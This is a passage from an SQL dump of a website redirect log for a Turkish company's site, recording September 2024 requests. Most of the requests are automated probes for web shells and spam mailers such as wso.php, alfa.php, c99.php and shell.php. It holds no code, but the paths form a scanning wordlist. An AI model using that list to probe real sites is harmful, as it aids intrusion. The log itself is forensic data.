05:54:38','0000-00-00 00:00:00',301),(35989,'http://3s-technologies.com.tr/en/nee.php',NULL,'www.google.com','',3,0,'2024-09-08 05:55:08','0000-00-00 00:00:00',301),(35990,'https://3s-technologies.com.tr/en/nee.php',NULL,'www.google.com','',1,0,'2024-09-08 05:55:12','0000-00-00 00:00:00',301),(35991,'http://3s-technologies.com.tr/en/olu.php',NULL,'www.google.com','',3,0,'2024-09-08 05:55:42','0000-00-00 00:00:00',301),(35992,'https://3s-technologies.com.tr/en/olu.php',NULL,'www.google.com','',1,0,'2024-09-08 05:55:46','0000-00-00 00:00:00',301),(35993,'https://3s-technologies.com.tr/en/rss.php',NULL,'www.google.com','',1,0,'2024-09-08 05:55:54','0000-00-00 00:00:00',301),(35994,'http://3s-technologies.com.tr/en/swm.php',NULL,'www.google.com','',3,0,'2024-09-08 05:56:08','0000-00-00 00:00:00',301),(35995,'https://3s-technologies.com.tr/en/swm.php',NULL,'www.google.com','',1,0,'2024-09-08 05:56:12','0000-00-00 00:00:00',301),(35996,'https://3s-technologies.com.tr/en/s_e.php',NULL,'www.google.com','',1,0,'2024-09-08 05:56:20','0000-00-00 00:00:00',301),(35997,'http://3s-technologies.com.tr/en/rxr.php',NULL,'www.google.com','',7,0,'2024-09-08 05:56:33','0000-00-00 00:00:00',301),(35998,'https://3s-technologies.com.tr/en/rxr.php',NULL,'www.google.com','',1,0,'2024-09-08 05:56:38','0000-00-00 00:00:00',301),(35999,'https://3s-technologies.com.tr/en/gif.php',NULL,'www.google.com','',1,0,'2024-09-08 05:56:47','0000-00-00 00:00:00',301),(36000,'http://3s-technologies.com.tr/en/lab.php',NULL,'www.google.com','',3,0,'2024-09-08 05:56:51','0000-00-00 00:00:00',301),(36001,'https://3s-technologies.com.tr/en/lab.php',NULL,'www.google.com','',1,0,'2024-09-08 05:56:56','0000-00-00 00:00:00',301),(36002,'https://3s-technologies.com.tr/en/snd.php',NULL,'www.google.com','',1,0,'2024-09-08 05:57:06','0000-00-00 00:00:00',301),(36003,'https://3s-technologies.com.tr/en/wpx.php',NULL,'www.google.com','',1,0,'2024-09-08 05:57:22','0000-00-00 00:00:00',301),(36004,'https://3s-technologies.com.tr/en/bala.php',NULL,'www.google.com','',1,0,'2024-09-08 05:57:30','0000-00-00 00:00:00',301),(36005,'http://3s-technologies.com.tr/en/dkiz.php',NULL,'www.google.com','',2,0,'2024-09-08 05:57:52','0000-00-00 00:00:00',301),(36006,'https://3s-technologies.com.tr/en/dkiz.php',NULL,'www.google.com','',1,0,'2024-09-08 05:57:56','0000-00-00 00:00:00',301),(36007,'http://3s-technologies.com.tr/en/leaf.php',NULL,'www.google.com','',1,0,'2024-09-08 05:58:00','0000-00-00 00:00:00',301),(36008,'https://3s-technologies.com.tr/en/leaf.php',NULL,'www.google.com','',1,0,'2024-09-08 05:58:04','0000-00-00 00:00:00',301),(36009,'http://3s-technologies.com.tr/en/alex.php',NULL,'www.google.com','',3,0,'2024-09-08 05:58:08','0000-00-00 00:00:00',301),(36010,'https://3s-technologies.com.tr/en/alex.php',NULL,'www.google.com','',1,0,'2024-09-08 05:58:13','0000-00-00 00:00:00',301),(36011,'http://3s-technologies.com.tr/en/data.php',NULL,'www.google.com','',5,0,'2024-09-08 05:58:25','0000-00-00 00:00:00',301),(36012,'https://3s-technologies.com.tr/en/data.php',NULL,'www.google.com','',2,0,'2024-09-08 05:58:29','0000-00-00 00:00:00',301),(36013,'https://3s-technologies.com.tr/en/1337.php',NULL,'www.google.com','',3,0,'2024-09-08 05:58:38','0000-00-00 00:00:00',301),(36014,'https://3s-technologies.com.tr/en/blog.php',NULL,'www.google.com','',1,0,'2024-09-08 05:58:46','0000-00-00 00:00:00',301),(36015,'http://3s-technologies.com.tr/en/kiss.php',NULL,'www.google.com','',3,0,'2024-09-08 05:58:50','0000-00-00 00:00:00',301),(36016,'https://3s-technologies.com.tr/en/kiss.php',NULL,'www.google.com','',1,0,'2024-09-08 05:58:54','0000-00-00 00:00:00',301),(36017,'http://3s-technologies.com.tr/en/vita.php',NULL,'www.google.com','',1,0,'2024-09-08 05:59:15','0000-00-00 00:00:00',301),(36018,'https://3s-technologies.com.tr/en/vita.php',NULL,'www.google.com','',1,0,'2024-09-08 05:59:19','0000-00-00 00:00:00',301),(36019,'https://3s-technologies.com.tr/en/wso1.php',NULL,'www.google.com','',1,0,'2024-09-08 05:59:36','0000-00-00 00:00:00',301),(36020,'http://3s-technologies.com.tr/en/3301.php',NULL,'www.google.com','',3,0,'2024-09-08 05:59:49','0000-00-00 00:00:00',301),(36021,'https://3s-technologies.com.tr/en/3301.php',NULL,'www.google.com','',1,0,'2024-09-08 05:59:54','0000-00-00 00:00:00',301),(36022,'https://3s-technologies.com.tr/en/date.php',NULL,'www.google.com','',1,0,'2024-09-08 06:00:15','0000-00-00 00:00:00',301),(36023,'https://3s-technologies.com.tr/en/s_ne.php',NULL,'www.google.com','',1,0,'2024-09-08 06:00:24','0000-00-00 00:00:00',301),(36024,'https://3s-technologies.com.tr/en/.alf.php',NULL,'www.google.com','',1,0,'2024-09-08 06:00:34','0000-00-00 00:00:00',301),(36025,'http://3s-technologies.com.tr/en/unix.php',NULL,'www.google.com','',3,0,'2024-09-08 06:00:57','0000-00-00 00:00:00',301),(36026,'https://3s-technologies.com.tr/en/unix.php',NULL,'www.google.com','',1,0,'2024-09-08 06:01:01','0000-00-00 00:00:00',301),(36027,'http://3s-technologies.com.tr/en/upel.php',NULL,'www.google.com','',3,0,'2024-09-08 06:01:06','0000-00-00 00:00:00',301),(36028,'https://3s-technologies.com.tr/en/upel.php',NULL,'www.google.com','',1,0,'2024-09-08 06:01:11','0000-00-00 00:00:00',301),(36029,'http://3s-technologies.com.tr/en/1975.php',NULL,'www.google.com','',6,0,'2024-09-08 06:01:15','0000-00-00 00:00:00',301),(36030,'https://3s-technologies.com.tr/en/1975.php',NULL,'www.google.com','',1,0,'2024-09-08 06:01:19','0000-00-00 00:00:00',301),(36031,'https://3s-technologies.com.tr/en/alwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:01:37','0000-00-00 00:00:00',301),(36032,'http://3s-technologies.com.tr/en/rahma.php',NULL,'www.google.com','',3,0,'2024-09-08 06:02:28','0000-00-00 00:00:00',301),(36033,'https://3s-technologies.com.tr/en/rahma.php',NULL,'www.google.com','',1,0,'2024-09-08 06:02:32','0000-00-00 00:00:00',301),(36034,'https://3s-technologies.com.tr/en/ohayo.php',NULL,'www.google.com','',1,0,'2024-09-08 06:02:51','0000-00-00 00:00:00',301),(36035,'https://3s-technologies.com.tr/en/small.php',NULL,'www.google.com','',1,0,'2024-09-08 06:03:20','0000-00-00 00:00:00',301),(36036,'https://3s-technologies.com.tr/en/goods.php',NULL,'www.google.com','',1,0,'2024-09-08 06:04:06','0000-00-00 00:00:00',301),(36037,'http://3s-technologies.com.tr/en/xhell.php',NULL,'www.google.com','',3,0,'2024-09-08 06:04:10','0000-00-00 00:00:00',301),(36038,'https://3s-technologies.com.tr/en/xhell.php',NULL,'www.google.com','',1,0,'2024-09-08 06:04:14','0000-00-00 00:00:00',301),(36039,'http://3s-technologies.com.tr/en/yuuki.php',NULL,'www.google.com','',3,0,'2024-09-08 06:04:19','0000-00-00 00:00:00',301),(36040,'https://3s-technologies.com.tr/en/yuuki.php',NULL,'www.google.com','',1,0,'2024-09-08 06:04:23','0000-00-00 00:00:00',301),(36041,'http://3s-technologies.com.tr/en/lufix.php',NULL,'www.google.com','',4,0,'2024-09-08 06:04:37','0000-00-00 00:00:00',301),(36042,'https://3s-technologies.com.tr/en/lufix.php',NULL,'www.google.com','',4,0,'2024-09-08 06:04:41','0000-00-00 00:00:00',301),(36043,'http://3s-technologies.com.tr/en/kindex.php',NULL,'www.google.com','',3,0,'2024-09-08 06:05:21','0000-00-00 00:00:00',301),(36044,'https://3s-technologies.com.tr/en/kindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:05:25','0000-00-00 00:00:00',301),(36045,'https://3s-technologies.com.tr/en/sindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:05:34','0000-00-00 00:00:00',301),(36046,'http://3s-technologies.com.tr/en/mailer.php',NULL,'www.google.com','',3,0,'2024-09-08 06:05:57','0000-00-00 00:00:00',301),(36047,'https://3s-technologies.com.tr/en/mailer.php',NULL,'www.google.com','',1,0,'2024-09-08 06:06:01','0000-00-00 00:00:00',301),(36048,'http://3s-technologies.com.tr/en/nasgor.php',NULL,'www.google.com','',4,0,'2024-09-08 06:06:06','0000-00-00 00:00:00',301),(36049,'https://3s-technologies.com.tr/en/nasgor.php',NULL,'www.google.com','',1,0,'2024-09-08 06:06:10','0000-00-00 00:00:00',301),(36050,'http://3s-technologies.com.tr/en/alexus.php',NULL,'www.google.com','',4,0,'2024-09-08 06:06:42','0000-00-00 00:00:00',301),(36051,'https://3s-technologies.com.tr/en/alexus.php',NULL,'www.google.com','',1,0,'2024-09-08 06:06:46','0000-00-00 00:00:00',301),(36052,'http://3s-technologies.com.tr/en/minimo.php',NULL,'www.google.com','',4,0,'2024-09-08 06:07:00','0000-00-00 00:00:00',301),(36053,'https://3s-technologies.com.tr/en/minimo.php',NULL,'www.google.com','',1,0,'2024-09-08 06:07:04','0000-00-00 00:00:00',301),(36054,'http://3s-technologies.com.tr/en/cpanel.php',NULL,'www.google.com','',3,0,'2024-09-08 06:07:28','0000-00-00 00:00:00',301),(36055,'https://3s-technologies.com.tr/en/cpanel.php',NULL,'www.google.com','',1,0,'2024-09-08 06:07:32','0000-00-00 00:00:00',301),(36056,'https://3s-technologies.com.tr/en/server.php',NULL,'www.google.com','',1,0,'2024-09-08 06:07:50','0000-00-00 00:00:00',301),(36057,'https://3s-technologies.com.tr/en/beence.php',NULL,'www.google.com','',1,0,'2024-09-08 06:08:08','0000-00-00 00:00:00',301),(36058,'https://3s-technologies.com.tr/en/export.php',NULL,'www.google.com','',1,0,'2024-09-08 06:08:17','0000-00-00 00:00:00',301),(36059,'https://3s-technologies.com.tr/en/legion.php',NULL,'www.google.com','',1,0,'2024-09-08 06:08:25','0000-00-00 00:00:00',301),(36060,'https://3s-technologies.com.tr/en/wp-mna.php',NULL,'www.google.com','',1,0,'2024-09-08 06:09:45','0000-00-00 00:00:00',301),(36061,'https://3s-technologies.com.tr/en/xmrlpc.php',NULL,'www.google.com','',1,0,'2024-09-08 06:09:54','0000-00-00 00:00:00',301),(36062,'http://3s-technologies.com.tr/en/stindex.php',NULL,'www.google.com','',3,0,'2024-09-08 06:09:58','0000-00-00 00:00:00',301),(36063,'https://3s-technologies.com.tr/en/stindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:10:04','0000-00-00 00:00:00',301),(36064,'http://3s-technologies.com.tr/en/baindex.php',NULL,'www.google.com','',3,0,'2024-09-08 06:10:18','0000-00-00 00:00:00',301),(36065,'https://3s-technologies.com.tr/en/baindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:10:23','0000-00-00 00:00:00',301),(36066,'https://3s-technologies.com.tr/en/wso1337.php',NULL,'www.google.com','',1,0,'2024-09-08 06:11:00','0000-00-00 00:00:00',301),(36067,'http://3s-technologies.com.tr/en/alexuse.php',NULL,'www.google.com','',3,0,'2024-09-08 06:11:12','0000-00-00 00:00:00',301),(36068,'https://3s-technologies.com.tr/en/alexuse.php',NULL,'www.google.com','',1,0,'2024-09-08 06:11:16','0000-00-00 00:00:00',301),(36069,'https://3s-technologies.com.tr/en/wp-file.php',NULL,'www.google.com','',1,0,'2024-09-08 06:11:33','0000-00-00 00:00:00',301),(36070,'https://3s-technologies.com.tr/en/marvins.php',NULL,'www.google.com','',1,0,'2024-09-08 06:12:05','0000-00-00 00:00:00',301),(36071,'https://3s-technologies.com.tr/en/blog/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:12:14','0000-00-00 00:00:00',301),(36072,'https://3s-technologies.com.tr/en/mailer1.php',NULL,'www.google.com','',1,0,'2024-09-08 06:12:21','0000-00-00 00:00:00',301),(36073,'https://3s-technologies.com.tr/en/xmlrpcs.php',NULL,'www.google.com','',1,0,'2024-09-08 06:12:29','0000-00-00 00:00:00',301),(36074,'http://3s-technologies.com.tr/en/indeeex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:12:33','0000-00-00 00:00:00',301),(36075,'https://3s-technologies.com.tr/en/indeeex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:12:38','0000-00-00 00:00:00',301),(36076,'http://3s-technologies.com.tr/en/.wp-back.php',NULL,'www.google.com','',7,0,'2024-09-08 06:12:42','0000-00-00 00:00:00',301),(36077,'https://3s-technologies.com.tr/en/.wp-back.php',NULL,'www.google.com','',2,0,'2024-09-08 06:12:46','0000-00-00 00:00:00',301),(36078,'http://3s-technologies.com.tr/en/sendmail.php',NULL,'www.google.com','',3,0,'2024-09-08 06:12:58','0000-00-00 00:00:00',301),(36079,'https://3s-technologies.com.tr/en/sendmail.php',NULL,'www.google.com','',1,0,'2024-09-08 06:13:03','0000-00-00 00:00:00',301),(36080,'http://3s-technologies.com.tr/en/wp/rahma.php',NULL,'www.google.com','',1,0,'2024-09-08 06:13:07','0000-00-00 00:00:00',301),(36081,'https://3s-technologies.com.tr/en/wp/rahma.php',NULL,'www.google.com','',1,0,'2024-09-08 06:13:11','0000-00-00 00:00:00',301),(36082,'https://3s-technologies.com.tr/en/foxwsov1.php',NULL,'www.google.com','',1,0,'2024-09-08 06:13:29','0000-00-00 00:00:00',301),(36083,'http://3s-technologies.com.tr/en/contacts.php',NULL,'www.google.com','',3,0,'2024-09-08 06:14:16','0000-00-00 00:00:00',301),(36084,'https://3s-technologies.com.tr/en/contacts.php',NULL,'www.google.com','',1,0,'2024-09-08 06:14:19','0000-00-00 00:00:00',301),(36085,'http://3s-technologies.com.tr/en/leaf_php.php',NULL,'www.google.com','',1,0,'2024-09-08 06:14:24','0000-00-00 00:00:00',301),(36086,'https://3s-technologies.com.tr/en/leaf_php.php',NULL,'www.google.com','',1,0,'2024-09-08 06:14:28','0000-00-00 00:00:00',301),(36087,'http://3s-technologies.com.tr/en/tmp/vuln.php',NULL,'www.google.com','',3,0,'2024-09-08 06:14:32','0000-00-00 00:00:00',301),(36088,'https://3s-technologies.com.tr/en/tmp/vuln.php',NULL,'www.google.com','',1,0,'2024-09-08 06:14:36','0000-00-00 00:00:00',301),(36089,'http://3s-technologies.com.tr/en/images/f.php',NULL,'www.google.com','',3,0,'2024-09-08 06:14:40','0000-00-00 00:00:00',301),(36090,'https://3s-technologies.com.tr/en/images/f.php',NULL,'www.google.com','',1,0,'2024-09-08 06:14:44','0000-00-00 00:00:00',301),(36091,'http://3s-technologies.com.tr/en/mt/pekok.php',NULL,'www.google.com','',5,0,'2024-09-08 06:14:48','0000-00-00 00:00:00',301),(36092,'https://3s-technologies.com.tr/en/mt/pekok.php',NULL,'www.google.com','',2,0,'2024-09-08 06:14:52','0000-00-00 00:00:00',301),(36093,'https://3s-technologies.com.tr/en/xltavrat.php',NULL,'www.google.com','',1,0,'2024-09-08 06:15:00','0000-00-00 00:00:00',301),(36094,'https://3s-technologies.com.tr/en/wso112233.php',NULL,'www.google.com','',2,0,'2024-09-08 06:15:09','0000-00-00 00:00:00',301),(36095,'https://3s-technologies.com.tr/en/edit-form.php',NULL,'www.google.com','',2,0,'2024-09-08 06:15:42','0000-00-00 00:00:00',301),(36096,'http://3s-technologies.com.tr/en/sendemail.php',NULL,'www.google.com','',3,0,'2024-09-08 06:15:54','0000-00-00 00:00:00',301),(36097,'https://3s-technologies.com.tr/en/sendemail.php',NULL,'www.google.com','',1,0,'2024-09-08 06:15:58','0000-00-00 00:00:00',301),(36098,'https://3s-technologies.com.tr/en/w3llstore.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:06','0000-00-00 00:00:00',301),(36099,'http://3s-technologies.com.tr/en/wp-signin.php',NULL,'www.google.com','',79,0,'2024-09-08 06:16:10','0000-00-00 00:00:00',301),(36100,'https://3s-technologies.com.tr/en/wp-signin.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:14','0000-00-00 00:00:00',301),(36101,'http://3s-technologies.com.tr/en/wp-beckup.php',NULL,'www.google.com','',3,0,'2024-09-08 06:16:18','0000-00-00 00:00:00',301),(36102,'https://3s-technologies.com.tr/en/wp-beckup.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:22','0000-00-00 00:00:00',301),(36103,'http://3s-technologies.com.tr/en/alfaindex.php',NULL,'www.google.com','',3,0,'2024-09-08 06:16:27','0000-00-00 00:00:00',301),(36104,'https://3s-technologies.com.tr/en/alfaindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:31','0000-00-00 00:00:00',301),(36105,'https://3s-technologies.com.tr/en/alfashell.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:40','0000-00-00 00:00:00',301),(36106,'http://3s-technologies.com.tr/en/images/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:45','0000-00-00 00:00:00',301),(36107,'https://3s-technologies.com.tr/en/images/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:49','0000-00-00 00:00:00',301),(36108,'http://3s-technologies.com.tr/en/uploads/l.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:53','0000-00-00 00:00:00',301),(36109,'https://3s-technologies.com.tr/en/uploads/l.php',NULL,'www.google.com','',1,0,'2024-09-08 06:16:57','0000-00-00 00:00:00',301),(36110,'http://3s-technologies.com.tr/en/wp-confirm.php',NULL,'www.google.com','',3,0,'2024-09-08 06:17:01','0000-00-00 00:00:00',301),(36111,'https://3s-technologies.com.tr/en/wp-confirm.php',NULL,'www.google.com','',1,0,'2024-09-08 06:17:06','0000-00-00 00:00:00',301),(36112,'https://3s-technologies.com.tr/en/wp-uploads.php',NULL,'www.google.com','',1,0,'2024-09-08 06:17:14','0000-00-00 00:00:00',301),(36113,'http://3s-technologies.com.tr/en/wp-admin/x.php',NULL,'www.google.com','',9,0,'2024-09-08 06:17:18','0000-00-00 00:00:00',301),(36114,'https://3s-technologies.com.tr/en/wp-admin/x.php',NULL,'www.google.com','',4,0,'2024-09-08 06:17:22','0000-00-00 00:00:00',301),(36115,'http://3s-technologies.com.tr/en/wp-confiig.php',NULL,'www.google.com','',3,0,'2024-09-08 06:17:26','0000-00-00 00:00:00',301),(36116,'https://3s-technologies.com.tr/en/wp-confiig.php',NULL,'www.google.com','',1,0,'2024-09-08 06:17:31','0000-00-00 00:00:00',301),(36117,'https://3s-technologies.com.tr/en/system_log.php',NULL,'www.google.com','',1,0,'2024-09-08 06:17:39','0000-00-00 00:00:00',301),(36118,'http://3s-technologies.com.tr/en/demo328/fw.php',NULL,'www.google.com','',3,0,'2024-09-08 06:17:43','0000-00-00 00:00:00',301),(36119,'https://3s-technologies.com.tr/en/demo328/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:17:47','0000-00-00 00:00:00',301),(36120,'http://3s-technologies.com.tr/en/images/sym.php',NULL,'www.google.com','',3,0,'2024-09-08 06:17:51','0000-00-00 00:00:00',301),(36121,'https://3s-technologies.com.tr/en/images/sym.php',NULL,'www.google.com','',1,0,'2024-09-08 06:17:55','0000-00-00 00:00:00',301),(36122,'https://3s-technologies.com.tr/en/leafmailer.php',NULL,'www.google.com','',1,0,'2024-09-08 06:18:12','0000-00-00 00:00:00',301),(36123,'https://3s-technologies.com.tr/en/uploads/up.php',NULL,'www.google.com','',1,0,'2024-09-08 06:18:20','0000-00-00 00:00:00',301),(36124,'https://3s-technologies.com.tr/en/images/c99.php',NULL,'www.google.com','',1,0,'2024-09-08 06:18:28','0000-00-00 00:00:00',301),(36125,'http://3s-technologies.com.tr/en/images/403.php',NULL,'www.google.com','',3,0,'2024-09-08 06:18:32','0000-00-00 00:00:00',301),(36126,'https://3s-technologies.com.tr/en/images/403.php',NULL,'www.google.com','',1,0,'2024-09-08 06:18:37','0000-00-00 00:00:00',301),(36127,'http://3s-technologies.com.tr/en/images/ave.php',NULL,'www.google.com','',1,0,'2024-09-08 06:18:40','0000-00-00 00:00:00',301),(36128,'https://3s-technologies.com.tr/en/images/ave.php',NULL,'www.google.com','',1,0,'2024-09-08 06:18:44','0000-00-00 00:00:00',301),(36129,'https://3s-technologies.com.tr/en/wp-admin/fw.php',NULL,'www.google.com','',2,0,'2024-09-08 06:19:00','0000-00-00 00:00:00',301),(36130,'http://3s-technologies.com.tr/en/wp-admin/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:19:04','0000-00-00 00:00:00',301),(36131,'https://3s-technologies.com.tr/en/wp-admin/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:19:08','0000-00-00 00:00:00',301),(36132,'https://3s-technologies.com.tr/en/media-admin.php',NULL,'www.google.com','',1,0,'2024-09-08 06:19:17','0000-00-00 00:00:00',301),(36133,'http://3s-technologies.com.tr/en/images/vuln.php',NULL,'www.google.com','',3,0,'2024-09-08 06:19:37','0000-00-00 00:00:00',301),(36134,'https://3s-technologies.com.tr/en/images/vuln.php',NULL,'www.google.com','',1,0,'2024-09-08 06:19:41','0000-00-00 00:00:00',301),(36135,'https://3s-technologies.com.tr/en/wp-admin/wp.php',NULL,'www.google.com','',1,0,'2024-09-08 06:19:49','0000-00-00 00:00:00',301),(36136,'https://3s-technologies.com.tr/en/leaf_mailer.php',NULL,'www.google.com','',1,0,'2024-09-08 06:19:57','0000-00-00 00:00:00',301),(36137,'http://3s-technologies.com.tr/en/new_license.php',NULL,'www.google.com','',3,0,'2024-09-08 06:20:02','0000-00-00 00:00:00',301),(36138,'https://3s-technologies.com.tr/en/new_license.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:07','0000-00-00 00:00:00',301),(36139,'http://3s-technologies.com.tr/en/images/tahe.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:11','0000-00-00 00:00:00',301),(36140,'https://3s-technologies.com.tr/en/images/tahe.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:16','0000-00-00 00:00:00',301),(36141,'http://3s-technologies.com.tr/en/files/image.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:21','0000-00-00 00:00:00',301),(36142,'https://3s-technologies.com.tr/en/files/image.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:25','0000-00-00 00:00:00',301),(36143,'https://3s-technologies.com.tr/en/images/about.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:34','0000-00-00 00:00:00',301),(36144,'https://3s-technologies.com.tr/en/wp-admin/wso.php',NULL,'www.google.com','',2,0,'2024-09-08 06:20:43','0000-00-00 00:00:00',301),(36145,'https://3s-technologies.com.tr/en/wp-content/x.php',NULL,'www.google.com','',1,0,'2024-09-08 06:20:52','0000-00-00 00:00:00',301),(36146,'http://3s-technologies.com.tr/en/wp-blog-post.php',NULL,'www.google.com','',3,0,'2024-09-08 06:20:57','0000-00-00 00:00:00',301),(36147,'https://3s-technologies.com.tr/en/wp-blog-post.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:01','0000-00-00 00:00:00',301),(36148,'http://3s-technologies.com.tr/en/file-manager.php',NULL,'www.google.com','',3,0,'2024-09-08 06:21:05','0000-00-00 00:00:00',301),(36149,'https://3s-technologies.com.tr/en/file-manager.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:09','0000-00-00 00:00:00',301),(36150,'http://3s-technologies.com.tr/en/images/pushy.php',NULL,'www.google.com','',3,0,'2024-09-08 06:21:13','0000-00-00 00:00:00',301),(36151,'https://3s-technologies.com.tr/en/images/pushy.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:17','0000-00-00 00:00:00',301),(36152,'http://3s-technologies.com.tr/en/uploads/s4.phtml',NULL,'www.google.com','',1,0,'2024-09-08 06:21:21','0000-00-00 00:00:00',301),(36153,'https://3s-technologies.com.tr/en/uploads/s4.phtml',NULL,'www.google.com','',1,0,'2024-09-08 06:21:25','0000-00-00 00:00:00',301),(36154,'https://3s-technologies.com.tr/en/wp-content/fw.php',NULL,'www.google.com','',2,0,'2024-09-08 06:21:33','0000-00-00 00:00:00',301),(36155,'http://3s-technologies.com.tr/en/wp-content/fx.php',NULL,'www.google.com','',3,0,'2024-09-08 06:21:38','0000-00-00 00:00:00',301),(36156,'https://3s-technologies.com.tr/en/wp-content/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:42','0000-00-00 00:00:00',301),(36157,'http://3s-technologies.com.tr/en/wp-admin/bala.php',NULL,'www.google.com','',2,0,'2024-09-08 06:21:46','0000-00-00 00:00:00',301),(36158,'https://3s-technologies.com.tr/en/wp-admin/bala.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:50','0000-00-00 00:00:00',301),(36159,'http://3s-technologies.com.tr/en/leafmailer2.8.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:53','0000-00-00 00:00:00',301),(36160,'https://3s-technologies.com.tr/en/leafmailer2.8.php',NULL,'www.google.com','',1,0,'2024-09-08 06:21:58','0000-00-00 00:00:00',301),(36161,'http://3s-technologies.com.tr/en/alexus-mailer.php',NULL,'www.google.com','',3,0,'2024-09-08 06:22:01','0000-00-00 00:00:00',301),(36162,'https://3s-technologies.com.tr/en/alexus-mailer.php',NULL,'www.google.com','',1,0,'2024-09-08 06:22:06','0000-00-00 00:00:00',301),(36163,'http://3s-technologies.com.tr/en/wp-admin/alfa.php',NULL,'www.google.com','',27,0,'2024-09-08 06:22:10','0000-00-00 00:00:00',301),(36164,'https://3s-technologies.com.tr/en/wp-admin/alfa.php',NULL,'www.google.com','',2,0,'2024-09-08 06:22:14','0000-00-00 00:00:00',301),(36165,'http://3s-technologies.com.tr/en/wp-content/up.php',NULL,'www.google.com','',3,0,'2024-09-08 06:22:18','0000-00-00 00:00:00',301),(36166,'https://3s-technologies.com.tr/en/wp-content/up.php',NULL,'www.google.com','',1,0,'2024-09-08 06:22:21','0000-00-00 00:00:00',301),(36167,'https://3s-technologies.com.tr/en/wp-content/wp.php',NULL,'www.google.com','',1,0,'2024-09-08 06:22:30','0000-00-00 00:00:00',301),(36168,'http://3s-technologies.com.tr/en/shell20220621.php',NULL,'www.google.com','',1,0,'2024-09-08 06:22:34','0000-00-00 00:00:00',301),(36169,'https://3s-technologies.com.tr/en/shell20220621.php',NULL,'www.google.com','',1,0,'2024-09-08 06:22:38','0000-00-00 00:00:00',301),(36170,'http://3s-technologies.com.tr/en/ff.php?pass=shell',NULL,'www.google.com','',1,0,'2024-09-08 06:22:42','0000-00-00 00:00:00',301),(36171,'https://3s-technologies.com.tr/en/ff.php?pass=shell',NULL,'www.google.com','',1,0,'2024-09-08 06:22:46','0000-00-00 00:00:00',301),(36172,'https://3s-technologies.com.tr/en/wp-admin/radio.php',NULL,'www.google.com','',1,0,'2024-09-08 06:22:54','0000-00-00 00:00:00',301),(36173,'https://3s-technologies.com.tr/en/wp-includes/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:02','0000-00-00 00:00:00',301),(36174,'http://3s-technologies.com.tr/en/wp-includes/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:07','0000-00-00 00:00:00',301),(36175,'https://3s-technologies.com.tr/en/wp-includes/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:11','0000-00-00 00:00:00',301),(36176,'http://3s-technologies.com.tr/en/wp-content/wso.php',NULL,'www.google.com','',7,0,'2024-09-08 06:23:15','0000-00-00 00:00:00',301),(36177,'https://3s-technologies.com.tr/en/wp-content/wso.php',NULL,'www.google.com','',2,0,'2024-09-08 06:23:19','0000-00-00 00:00:00',301),(36178,'https://3s-technologies.com.tr/en/wp-admin/style.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:28','0000-00-00 00:00:00',301),(36179,'http://3s-technologies.com.tr/en/wp-admin/shell.php',NULL,'www.google.com','',3,0,'2024-09-08 06:23:32','0000-00-00 00:00:00',301),(36180,'https://3s-technologies.com.tr/en/wp-admin/shell.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:37','0000-00-00 00:00:00',301),(36181,'http://3s-technologies.com.tr/en/uploads/upload.php',NULL,'www.google.com','',3,0,'2024-09-08 06:23:41','0000-00-00 00:00:00',301),(36182,'https://3s-technologies.com.tr/en/uploads/upload.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:45','0000-00-00 00:00:00',301),(36183,'https://3s-technologies.com.tr/en/.tmb/cache/shz.php',NULL,'www.google.com','',1,0,'2024-09-08 06:23:53','0000-00-00 00:00:00',301),(36184,'http://3s-technologies.com.tr/en/wp-content/bala.php',NULL,'www.google.com','',2,0,'2024-09-08 06:23:57','0000-00-00 00:00:00',301),(36185,'https://3s-technologies.com.tr/en/wp-content/bala.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:01','0000-00-00 00:00:00',301),(36186,'http://3s-technologies.com.tr/en/wp-includes/sys.php',NULL,'www.google.com','',3,0,'2024-09-08 06:24:14','0000-00-00 00:00:00',301),(36187,'https://3s-technologies.com.tr/en/wp-includes/sys.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:18','0000-00-00 00:00:00',301),(36188,'https://3s-technologies.com.tr/en/wp-content/alfa.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:25','0000-00-00 00:00:00',301),(36189,'https://3s-technologies.com.tr/en/wp-admin/css/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:34','0000-00-00 00:00:00',301),(36190,'http://3s-technologies.com.tr/en/wp-content/vuln.php',NULL,'www.google.com','',3,0,'2024-09-08 06:24:38','0000-00-00 00:00:00',301),(36191,'https://3s-technologies.com.tr/en/wp-content/vuln.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:42','0000-00-00 